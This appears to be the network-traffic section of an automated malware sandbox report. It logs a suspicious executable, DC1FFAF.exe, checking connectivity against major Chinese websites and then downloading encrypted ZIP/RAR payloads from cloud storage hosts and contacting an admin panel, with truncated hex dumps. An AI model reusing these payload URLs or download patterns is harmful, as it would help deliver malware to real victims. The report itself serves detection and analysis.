                                                                                                                                    Aug 6, 2024 10:29:18.328792095 CEST1236INData Raw: 07 21 b6 13 99 5d 7a 91 59 8d de dd f8 96 91 05 a1 93 dd b6 4f 07 65 2f 5f 3a f8 b2 fb 0b fb 66 d7 65 44 34 b3 9a 49 a2 c2 55 bf 42 9b bd 25 00 ca 1e 2e f7 31 7a b6 1c b7 57 9c df 7e 59 80 19 43 38 d7 66 8d 33 6e 17 1c 0e 2e 47 93 b9 9b f5 c9 29
                                                                                                                                    Data Ascii: !]zYOe/_:feD4IUB%.1zW~YC8f3n.G)*Z;Ap"&IL>7u]M[3(W%5601gR(B6^OI}ASqy#{Bg<u#Os5^l=Kk`8_>|$*
                                                                                                                                    Aug 6, 2024 10:29:18.328809023 CEST1236INData Raw: 20 ff 2f 3b cf b5 db 93 20 6c 39 34 12 26 b6 28 57 3c 3f 59 2c 30 4b fe 2c f8 c9 6f 5e b0 45 dd e7 37 8d b9 97 57 2f 99 17 a0 0a 86 cd 77 27 b7 96 59 05 d5 b4 50 3d 6d ad b4 14 84 0d 87 be cf c4 66 29 b1 f7 25 4d 71 fc 5c cc fb bd 56 ef 46 d1 93
                                                                                                                                    Data Ascii: /; l94&(W<?Y,0K,o^E7W/w'YP=mf)%Mq\VFLRdVhAo6/ 7Y'DAY2(2o+AX!s/~aMQFBlVHy>-`iF`_AQTB**}MpR{b*l l> `C@kAXqHvrtFP
                                                                                                                                    Aug 6, 2024 10:29:18.328823090 CEST1236INData Raw: 5c 8e 75 b8 69 40 b0 c4 39 36 3b 56 43 1c fe 65 b9 e5 f5 4b be bd aa f0 1a a9 4c 2d 95 f5 4a d4 c0 5d 90 ea a4 87 ad 2c b7 a2 17 0a 6a 0d eb 10 91 e3 62 0d 14 04 3f 9c aa f0 40 60 52 16 1e 89 c8 28 06 2f 90 52 90 a6 ad 43 05 cc 15 50 10 1e 54 41
                                                                                                                                    Data Ascii: \ui@96;VCeKL-J],jb?@`R(/RCPTAD+U)*]tq[TxT!UtiHAq+rn*cYmOz2P#QH:.etaUOdC3r{fW?#:5Cd=ON;&^f{|O
                                                                                                                                    Aug 6, 2024 10:29:18.333755970 CEST1236INData Raw: 98 0b 06 4a 35 52 15 9d 99 c5 32 8d 2e 2c fb e9 9f cd c2 19 23 49 d5 67 78 0d 83 96 a7 b2 72 81 d8 84 d6 ed 91 9a 23 44 85 36 8d 1a 9d 51 ff de 45 47 c4 e7 74 df 59 7a 68 74 d1 b4 c2 38 75 62 3c 6d f4 06 37 12 8d 18 b4 da 4b 8c 61 7a 3f 2c eb fc
                                                                                                                                    Data Ascii: J5R2.,#Igxr#D6QEGtYzht8ub<m7Kaz?,tonU];x"_k\^zhMMf3XUguRnQERSyT_!>;7>]\99|$moXv1sA;ng=(zW+z5,29_m


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    15192.168.2.64972943.159.118.23880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.259001970 CEST221OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.tencent.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:17.730237961 CEST196INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.tencent.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: EdgeOne_SS_OC
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    EO-LOG-UUID: 18362694056495958005


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    16192.168.2.64973143.132.81.17380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.492786884 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.hupu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.420639992 CEST227INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.hupu.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-NWS-LOG-UUID: 15158832663299163961
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Lego Server
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    X-Cache-Lookup: Return Directly


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    17192.168.2.649732163.171.208.13380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.503482103 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.cctv.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.430912018 CEST520INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 0
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: Cdn Cache Server V2.0
                                                                                                                                    Location: https://www.cctv.com/
                                                                                                                                    X-Via: 1.0 PSxjpSin5ij130:8 (Cdn Cache Server V2.0)
                                                                                                                                    X-Ws-Request-Id: 66b1dede_PSxjpSin5df135_28151-7632
                                                                                                                                    Set-Cookie: HMF_CI=747f956f3f63eec4a3a71a4e9234ba17527b37f30e3db340fd3b266994e1e863d1cd58a09d3b5390dde96341d4e0efb709e6b90a3188d864ce71e2418e181b83a5; Expires=Thu, 05-Sep-24 08:29:18 GMT; Path=/


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    18192.168.2.64973347.254.187.18380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.537237883 CEST261OUTGET /2024-08-06/16_26 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: xianggangcs.oss-accelerate.aliyuncs.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.806988001 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: AliyunOSS
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 1566
                                                                                                                                    Connection: keep-alive
                                                                                                                                    x-oss-request-id: 66B1DEDEAB4B811B686CAB7D
                                                                                                                                    Content-Range: bytes 0-1565/1566
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    ETag: "ECB5B3E13C02F7516555E7450F48E552"
                                                                                                                                    Last-Modified: Tue, 06 Aug 2024 08:27:03 GMT
                                                                                                                                    x-oss-object-type: Normal
                                                                                                                                    x-oss-hash-crc64ecma: 12250167233259248927
                                                                                                                                    x-oss-storage-class: Standard
                                                                                                                                    x-oss-ec: 0048-00000111
                                                                                                                                    Content-Disposition: attachment
                                                                                                                                    x-oss-force-download: true
                                                                                                                                    Content-MD5: 7LWz4TwC91FlVedFD0jlUg==
                                                                                                                                    x-oss-server-time: 22
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 cf ad 05 59 6c d5 e4 fb b4 05 00 00 74 13 00 00 04 00 00 00 63 6c 73 74 21 28 f0 80 94 6f c1 16 5b de e4 9a cf d1 3a 7a fd b6 89 6a df 2d 36 7e d5 2d 87 f8 b8 3e a2 9f 98 3c c9 52 97 7e 5f 64 ee 14 3b ea 3e de 84 0a e6 d5 dd c2 75 35 8e ff 56 80 d2 1d 60 01 11 82 21 86 51 33 03 b4 2a bf 1c cd 81 62 41 64 57 cd ae ee 81 db 82 86 08 32 b1 6d 2d 24 95 89 1e 1b 0b 34 11 fc 34 40 53 ae df f4 2d b5 a3 63 f7 36 85 05 08 6f 7d 52 16 c2 5d 5e aa c8 b0 be f2 4c 60 de c7 f5 e2 21 74 ea 55 85 e7 0a 9f b7 e4 34 f3 dc 3a 72 fd 26 c6 16 49 3d 5e 63 86 75 7f 60 2c d4 52 68 c3 dd e7 e9 b1 4a d4 64 19 61 fb cb 26 98 1d 09 14 a2 89 a8 df 3f 55 6b d2 cc 17 ce e5 88 e6 15 ba bf ba 0e 3d 1b 92 1a 0e 4c 89 56 c5 a0 17 64 3a 3a f7 90 dc 3e 1f f9 66 62 e1 9b b8 af ee 7f b0 c9 87 0d 4c 33 35 37 15 7d b3 bc 25 2b e0 ed c1 a7 5e 19 b4 06 e3 a6 40 29 e7 b4 07 78 81 8a d8 e2 f3 0a e9 28 d9 f2 64 ba de 15 14 18 46 a4 bf 9e 4f c4 7e 65 5b e5 14 2b 4b 8a 44 a1 11 43 9a bc 8e aa 97 19 74 41 f5 79 5d f0 [TRUNCATED]
                                                                                                                                    Data Ascii: PKYltclst!(o[:zj-6~-><R~_d;>u5V`!Q3*bAdW2m-$44@S-c6o}R]^L`!tU4:r&I=^cu`,RhJda&?Uk=LVd::>fbL357}%+^@)x(dFO~e[+KDCtAy]H q28,|<8K=GAEEyv-.!FryLRW?x# I::6\!D+.x%4!YEQX9pFlaLb0c;cg5A7/l:7rcW`AnI(T=ttG4'Pw2jLY|"\sH.{ZQUo1EEBa,;WOAw,r5fU(
                                                                                                                                    Aug 6, 2024 10:29:18.807018042 CEST942INData Raw: 27 e1 af 95 8b 6d bb 3f 0d 7a cf c7 0d 71 56 fb b2 1f 0b fa 5f 0b 7d 76 40 08 31 6d eb 37 e2 55 b7 b1 1e 2c 5d cf 45 ed 5e b4 18 14 7b 86 5b c2 bb d1 5f 6f db 79 55 d8 54 df ea 4c 36 13 b3 5c 07 8d 75 99 28 ea 89 94 d7 e6 ec 6a b9 e6 69 60 09 39
                                                                                                                                    Data Ascii: 'm?zqV_}v@1m7U,]E^{[_oyUTL6\u(ji`9~3po,va;g@(yF!?[_8y2lifWI-b[M0^pu<F'7Wl%Y|&4Q"Mp~F6Sk


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    19192.168.2.64973445.194.34.25080420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.542370081 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.jb51.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.119102001 CEST260INHTTP/1.1 302 Found
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Location: /GE/CC/VALIDATOR?key=38b1b558e1bd3c303917a923241bb25f.33bc353c191fbc35f20c034ce52b2649.1722932957&url=http%3A%2F%2Fwww.jb51.net%2F
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    Content-Length: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    20192.168.2.64973660.221.222.180420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.642553091 CEST225OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.autohome.com.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:19.540962934 CEST368INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: JSP3/2.0.14
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:19 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 144
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.autohome.com.cn/
                                                                                                                                    X-Cache-Status: MISS
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4a 53 50 33 2f 32 2e 30 2e 31 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>JSP3/2.0.14</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    21192.168.2.64973743.159.71.11880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:17.824565887 CEST219OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.zhihu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:18.754584074 CEST273INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.zhihu.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-NWS-LOG-UUID: 5860979505262713429
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: OverSea_E0
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:18 GMT
                                                                                                                                    X-Cache-Lookup: Return Directly
                                                                                                                                    x-edge-timing: 0.001
                                                                                                                                    x-cdn-provider: tencent


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    22192.168.2.64973927.221.16.14980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:19.576339006 CEST232OUTGET /operate/18771 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: sinacloud.net
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:20.739130974 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:17 GMT
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Length: 344118
                                                                                                                                    Connection: keep-alive
                                                                                                                                    X-RequestId: 50fae0e6-2408-0616-2920-b4055d7078f2
                                                                                                                                    X-Requester: GRPS000000ANONYMOUSE
                                                                                                                                    Last-Modified: Thu, 01 Aug 2024 08:27:46 GMT
                                                                                                                                    X-Filesize: 344118
                                                                                                                                    ETag: "15e5aaedf5470eb1c8c76bd13d3ce1aa"
                                                                                                                                    x-amz-meta-crc32: 670F00D0
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    Access-Control-Allow-Headers: Origin, Content-Type, Accept, Range, Content-Length
                                                                                                                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS, HEAD
                                                                                                                                    Access-Control-Max-Age: 31536000
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Content-Range: bytes 0-344117/344118
                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 16 83 01 59 b0 e5 a2 38 c2 3f 05 00 00 8e 05 00 09 00 00 00 31 38 37 37 31 2e 72 61 72 ba 9a d9 45 73 c6 b1 46 99 81 e4 56 02 16 45 de 1a 29 b1 23 07 9c 63 42 b1 06 88 56 01 85 77 b3 46 e2 fd e1 3f ef f4 39 4c 63 e1 05 a1 6a 51 bc c2 3d 5b da c3 95 5c 82 62 4c 48 f0 31 84 62 88 62 ff 20 2c ab 75 62 76 43 3d 71 9e ef 54 42 74 e3 10 f1 b4 0d b1 65 cf bb 34 9a ac f0 2e 8d 81 18 8b d5 75 7e 68 82 66 88 e3 3b 82 1f c5 4a 97 74 5b 18 c6 ce f0 b4 43 57 d1 6b 4d 97 63 ec 6d 15 29 27 84 53 1d 80 eb 06 cd 18 b3 6f b8 ed 63 7d 58 92 6c 82 31 6b bd 86 c9 65 fa 63 52 ca fd c7 cc 47 02 98 5c c6 bc a6 97 a4 78 54 0e 5e 2d 9e 63 8f 75 62 e1 68 2d eb 29 43 f3 f6 86 49 a1 db 4f 64 b7 e7 09 42 bf 0e 99 d9 06 f0 2e 63 26 05 68 31 a4 56 e5 90 56 f3 04 4b 69 1a 32 ed 2a 85 7e ad 6c d7 b4 d0 fa 07 55 af 5b 27 e9 03 a4 4c 66 a9 a0 a3 fd 77 47 79 1a a9 1f 95 b7 47 5a 28 a7 b7 58 46 bc d2 f8 90 57 7b f6 bf 05 8d 60 25 a7 95 eb 8e a2 ab a7 64 5d a2 3d f4 03 94 75 75 6a d2 69 e2 b5 e4 50 92 d4 b5 [TRUNCATED]
                                                                                                                                    Data Ascii: PKY8?18771.rarEsFVE)#cBVwF?9LcjQ=[\bLH1bb ,ubvC=qTBte4.u~hf;Jt[CWkMcm)'Soc}Xl1kecRG\xT^-cubh-)CIOdB.c&h1VVKi2*~lU['LfwGyGZ(XFW{`%d]=uujiPWgp([XW<g"n9(WLcc<1l3`jJ+SwekSi1Zij!*5d\(6,7]TUwPJzPAWHUubE#mR}{7.$.>~VU<w
                                                                                                                                    Aug 6, 2024 10:29:20.739209890 CEST153INData Raw: 37 ec f3 88 32 ee 51 10 e6 29 49 1d e5 be c6 e1 e1 d6 48 99 95 f0 6f 38 33 79 fd d9 2c ef cf 4e e2 3b bc 31 5f ff 55 1f 10 ae 38 1c ef 46 b1 1d db 48 ef 06 f6 3c 4a 6c 32 0d 82 ff bf 06 2d b9 91 c3 9e 7e 1d 29 9b 97 86 10 e8 50 96 fb 70 a7 b9 af
                                                                                                                                    Data Ascii: 72Q)IHo83y,N;1_U8FH<Jl2-~)Pp,g`5)Db4L/B&FhOF@8)":2$X
                                                                                                                                    Aug 6, 2024 10:29:20.739223003 CEST1236INData Raw: 70 10 1c 74 ce c1 1a a3 2b f0 ac a5 63 62 eb cb 7a 4b 28 af 3a a8 30 5f b1 39 09 3e 75 2c 20 e7 d7 70 3e 42 b4 a7 97 11 c4 91 f9 ae 71 e9 2a 04 12 0d e4 38 18 e3 c0 a2 ea 54 f4 c4 89 62 5e 44 af f3 1f ee 1d f4 09 dc 46 77 92 d6 99 50 95 02 d5 2b
                                                                                                                                    Data Ascii: pt+cbzK(:0_9>u, p>Bq*8Tb^DFwP+1EV5gj3|m&u),\,6_/Ed>81Qq"k2Q/EDo;R1>~?c})`]/8<MnB-
                                                                                                                                    Aug 6, 2024 10:29:20.739234924 CEST1236INData Raw: 75 f8 9e bf 27 7b 6a 12 76 87 28 11 b3 4f 78 ab d1 4e 79 ea 8b 9d 95 17 3e f4 c3 5d 27 d9 f2 62 0e 3d 8d 3c 88 5b 69 64 4e f2 24 76 ce e0 0b 37 fa 84 18 48 a6 df fb 7e 6a 03 47 b8 e9 e2 f5 53 37 ae e2 cd 67 ed d4 b4 9a 64 30 5c 08 35 51 0e 99 43
                                                                                                                                    Data Ascii: u'{jv(OxNy>]'b=<[idN$v7H~jGS7gd0\5QC6q!oH2dCwPWDAE@?z?Zi$?y@>ax#A8fNN`*FC-dM:snMb.kO!h\ULh\]Z:
                                                                                                                                    Aug 6, 2024 10:29:20.739248991 CEST1236INData Raw: 45 45 78 ea 87 90 bc 3f a9 14 0f 34 d5 08 b5 42 68 ca 15 b0 42 91 8d c6 a0 e9 33 28 0d de ff 4e 57 9f a0 b7 38 38 3a 40 14 19 55 a8 25 2d ea 82 d1 f5 fc 5d 63 67 e2 4c f0 91 5d 16 d7 09 57 14 f5 fb 7b dd 09 e8 35 48 72 63 11 8b 43 3a 30 a8 11 97
                                                                                                                                    Data Ascii: EEx?4BhB3(NW88:@U%-]cgL]W{5HrcC:0Ztxpx5//>BE\>g#rTUN/1u%f"i.|/m=I93M2OZ8"^0hEZ*olpqcWVNCD;rZE/
                                                                                                                                    Aug 6, 2024 10:29:20.739262104 CEST1236INData Raw: 89 d0 e2 3e 39 13 06 1b ba a9 88 c7 a1 fd db 9a 91 70 6c f1 88 c5 76 14 34 16 14 8c bb e4 69 13 e4 1c 77 da e9 14 2d 1b 8a ce 1c 45 47 2e 77 30 5b e9 f5 ad 27 91 49 31 91 fe bb b5 dd c1 79 28 8f d2 8d d4 04 be 5e e5 4f 0e 2b 5e 87 6a 9a 1e b4 ff
                                                                                                                                    Data Ascii: >9plv4iw-EG.w0['I1y(^O+^jH=pEU`AWydu0FPj=qb>A4=$$?[XmH-!%v`|P] 5vLYW7N}}t/
                                                                                                                                    Aug 6, 2024 10:29:20.739276886 CEST1236INData Raw: 92 56 74 5d 7e eb bb a8 dc 07 42 db 03 91 cb 4c 11 e1 cd 03 77 7b fc 50 e3 b2 eb 86 64 af f6 e7 17 8f 08 24 a7 cd 5b b5 da f3 1c 92 2d 11 09 e2 f3 c4 b2 47 56 79 da 25 1a aa 59 90 fe ec d3 f2 9b ab a5 25 46 8c 72 90 02 91 b2 74 5f 7b 26 87 21 b3
                                                                                                                                    Data Ascii: Vt]~BLw{Pd$[-GVy%Y%Frt_{&!eT}!U4Iea=1ut[b|Vz8OX1nVAgwg`/P*]K3bi{o9G,~TiEU2Pqwsc3l 6?;
                                                                                                                                    Aug 6, 2024 10:29:20.739316940 CEST860INData Raw: c0 79 29 41 df b8 c6 bb 4c 8b 38 0c f1 09 27 65 e2 ee e7 e0 66 a4 3f 65 75 7d fa 8f e7 97 4c 3d d0 4a 3c 14 0b 0b 96 22 d6 05 45 97 64 9b b6 a0 7c 42 cf ed c1 9d b2 66 13 cd 7d 62 02 af 0a 1c 21 38 6e 6a 2f e6 75 42 f6 89 36 5e 73 1c 8b 3d 7a 54
                                                                                                                                    Data Ascii: y)AL8'ef?eu}L=J<"Ed|Bf}b!8nj/uB6^s=zT'"]F5#-XtRDK-bgk(4 50" Ipi3=Yfz579m2'"=f[Au,G;4\jqhmoW#
                                                                                                                                    Aug 6, 2024 10:29:20.739330053 CEST1236INData Raw: e8 9f d3 c4 ce a0 ed 93 a6 8c ba d5 7f b1 b7 df 6d 8f c4 b4 a1 cc e3 49 3b 06 f9 f1 7d 39 47 b3 ce 80 61 45 66 f8 1b 80 4d 42 1c 3b da c6 88 2a 68 7c 31 dc 37 e0 93 0d d1 0a e0 3f 2a 28 92 a4 e9 d1 8c 0a 6d 71 db 7c 91 20 28 cc 1b 2a 69 fb 26 9c
                                                                                                                                    Data Ascii: mI;}9GaEfMB;*h|17?*(mq| (*i&).8y.rRmBz"Xvd3f5}V /9^1^p+~-zBy:"k5.L\8J/Z.FNR_$tleqb>F
                                                                                                                                    Aug 6, 2024 10:29:20.739347935 CEST1236INData Raw: 4d 4a 21 a9 d5 66 3c c8 6c 4a 55 58 58 86 51 22 a5 f2 40 4a f3 a5 a3 db 18 ef 92 f9 57 80 da bf 85 af 0d 9d 33 25 75 2b d0 65 f9 02 67 39 9e 46 d1 12 88 83 b0 60 6f d0 ed ff 24 ec d7 df db 03 fa a3 df 79 33 d7 83 b6 ca 36 cd 0f 9f 7c 21 92 76 c0
                                                                                                                                    Data Ascii: MJ!f<lJUXXQ"@JW3%u+eg9F`o$y36|!vudtH]|+0W,86mrJ>u *c^(+/ZJm3;LRhKk_X^ak%E5*KYt'-BkFm6L$!
                                                                                                                                    Aug 6, 2024 10:29:20.750389099 CEST1236INData Raw: 70 9a 34 5f 01 20 b9 8d 9a 89 74 93 ca d8 a0 7e 9d dc 9b cd 21 48 47 19 0c 09 5e 68 45 72 6b b2 3f 32 33 10 0f 80 f6 4a 7a e7 a6 40 65 4a 48 90 cb 32 a5 60 76 87 1f ba 12 ee 68 d2 61 8d df 0a 2d ec 8e c5 91 a9 6f e3 05 82 44 ab 4a 42 50 84 89 9d
                                                                                                                                    Data Ascii: p4_ t~!HG^hErk?23Jz@eJH2`vha-oDJBPuZVWXxbX8Q?b77sr+Z9BPGEvC$&^DRUl`\-...ENTurd=MUI}1z."E=[W28{.R(~o[v;j9/8


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    23192.168.2.6497408.218.87.780420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:29:19.732044935 CEST205OUTGET /kss_admin/ HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Host: yanzheng.appchizi.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:29:20.689290047 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                    Date: Tue, 06 Aug 2024 08:29:20 GMT
                                                                                                                                    Server: Apache/2.4.10 (Debian) PHP/5.3.29
                                                                                                                                    X-Powered-By: PHP/5.3.29
                                                                                                                                    Set-Cookie: PHPSESSID=625b65240b88c7c82b569cf46c637dc2; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Range: bytes 0-4574/4575
                                                                                                                                    Content-Length: 4575
                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e e7 99 be e5 ba a6 e4 b8 80 e4 b8 8b ef bc 8c e4 bd a0 e5 b0 b1 e7 9f a5 e9 81 93 2d 2d 4d 31 37 2d 50 32 37 32 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 e6 9c 8d e5 8a a1 e7 ab af e7 89 88 e6 9c ac 22 20 63 6f 6e 74 65 6e [TRUNCATED]
